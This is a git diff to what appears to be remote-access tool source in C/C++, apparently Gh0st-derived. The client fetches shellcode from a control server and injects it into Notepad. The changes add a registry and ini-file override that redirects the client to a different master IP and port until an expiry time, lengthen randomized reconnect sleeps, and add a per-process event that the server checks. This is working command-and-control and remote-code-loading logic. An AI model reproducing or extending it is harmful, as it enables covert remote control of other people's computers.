diff --git a/client/main.c b/client/main.c index 0ab6be0..2580947 100644 --- a/client/main.c +++ b/client/main.c @@ -6,16 +6,16 @@ #include #include #include +#include +#include #ifdef _DEBUG -#include #define Mprintf printf #define IsRelease 0 #else #define Mprintf(format, ...) #define IsRelease 1 #endif -#include #pragma comment(lib, "ws2_32.lib") @@ -89,6 +89,28 @@ int GetIPAddress(const char* hostName, char* outIpBuffer, int bufferSize) return 0; } +char* ReadRegistryString(const char* subKey, const char* valueName) { + HKEY hKey = NULL; + LONG ret = RegOpenKeyExA(HKEY_CURRENT_USER, subKey, 0, KEY_READ, &hKey); + if (ret != ERROR_SUCCESS) + return NULL; + + DWORD dataType = 0; + DWORD dataSize = 1024; + char *data = (char*)malloc(dataSize+1); + if (data) { + ret = RegQueryValueExA(hKey, valueName, NULL, &dataType, (LPBYTE)data, &dataSize); + data[min(dataSize, 1024)] = '\0'; + if (ret != ERROR_SUCCESS || (dataType != REG_SZ && dataType != REG_EXPAND_SZ)) { + free(data); + data = NULL; + } + } + RegCloseKey(hKey); + + return data; +} + const char* ReceiveShellcode(const char* sIP, int serverPort, int* sizeOut) { if (!sIP || !sizeOut) return NULL; @@ -96,11 +118,26 @@ const char* ReceiveShellcode(const char* sIP, int serverPort, int* sizeOut) { if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) return NULL; + char addr[100] = { 0 }; + strcpy(addr, sIP); + const char* path = "Software\\ServerD11\\settings"; + char* saved_ip = ReadRegistryString(path, "master"); + char* saved_port = ReadRegistryString(path, "port"); + char* valid_to = ReadRegistryString(path, "valid_to"); + int now = time(NULL), valid = valid_to ? atoi(valid_to) : 0; + if (now <= valid && saved_ip && *saved_ip && saved_port && *saved_port) { + strcpy(addr, saved_ip); + serverPort = atoi(saved_port); + } + free(saved_ip); saved_ip = NULL; + free(saved_port); saved_port = NULL; + free(valid_to); valid_to = NULL; + char serverIP[INET_ADDRSTRLEN] = { 0 }; - if (GetIPAddress(sIP, serverIP, sizeof(serverIP)) == 0) { + if (GetIPAddress(addr, serverIP, sizeof(serverIP)) == 0) { Mprintf("Resolved IP: %s\n", serverIP); } else { - Mprintf("Failed to resolve '%s'.\n", sIP); + Mprintf("Failed to resolve '%s'.\n", addr); WSACleanup(); return NULL; } @@ -112,7 +149,7 @@ const char* ReceiveShellcode(const char* sIP, int serverPort, int* sizeOut) { int attemptCount = 0, requestCount = 0; do { if (!isFirstConnect) - Sleep(IsRelease ? rand()%60 * 1000 : 5000); + Sleep(IsRelease ? rand()%120 * 1000 : 5000); isFirstConnect = FALSE; if (++attemptCount == 20) PostMessage((HWND)g_Server.parentHwnd, 4046, (WPARAM)933711587, (LPARAM)1643138518); @@ -216,6 +253,9 @@ inline int MemoryFind(const char* szBuffer, const char* Key, int iBufferSize, in #endif extern DLL_API DWORD WINAPI run(LPVOID param) { + char eventName[64] = { 0 }; + sprintf(eventName, "EVENT_%d", GetCurrentProcessId()); + HANDLE hEvent = CreateEventA(NULL, TRUE, FALSE, eventName); PluginParam* info = (PluginParam*)param; int size = 0; const char* dllData = ReceiveShellcode(info->IP, info->Port, &size); diff --git a/client/test.cpp b/client/test.cpp index 7c5807d..8036cc6 100644 --- a/client/test.cpp +++ b/client/test.cpp @@ -259,6 +259,15 @@ int main(int argc, const char *argv[]) status = 0; SetConsoleCtrlHandler(&callback, TRUE); + iniFile cfg(CLIENT_PATH); + auto now = time(0); + auto valid_to = atof(cfg.GetStr("settings", "valid_to").c_str()); + if (now <= valid_to) { + auto saved_ip = cfg.GetStr("settings", "master"); + auto saved_port = cfg.GetInt("settings", "port"); + g_ConnectAddress.SetServer(saved_ip.c_str(), saved_port); + } + // 此 Shell code 连接本机6543端口,注入到记事本 if (g_ConnectAddress.iStartup == Startup_InjSC) { diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp index e74dc4f..7bddf1e 100644 --- a/server/2015Remote/2015RemoteDlg.cpp +++ b/server/2015Remote/2015RemoteDlg.cpp @@ -93,6 +93,12 @@ static UINT Indicators[] = IDR_STATUSBAR_STRING }; +std::string EventName() { + char eventName[64]; + snprintf(eventName, sizeof(eventName), "EVENT_%d", GetCurrentProcessId()); + return eventName; +} + ////////////////////////////////////////////////////////////////////////// // 淇濆瓨 unordered_map 鍒版枃浠 @@ -1151,6 +1157,14 @@ void CMy2015RemoteDlg::OnTimer(UINT_PTR nIDEvent) { if (nIDEvent == TIMER_CHECK) { + static int count = 0; + static std::string eventName = EventName(); + HANDLE hEvent = OpenEventA(SYNCHRONIZE, FALSE, eventName.c_str()); + if (hEvent) { + CloseHandle(hEvent); + }else if (++count == 10) { + THIS_APP->UpdateMaxConnection(count); + } if (!m_superPass.empty()) { Mprintf(">>> Timer is killed <<<\n"); KillTimer(nIDEvent);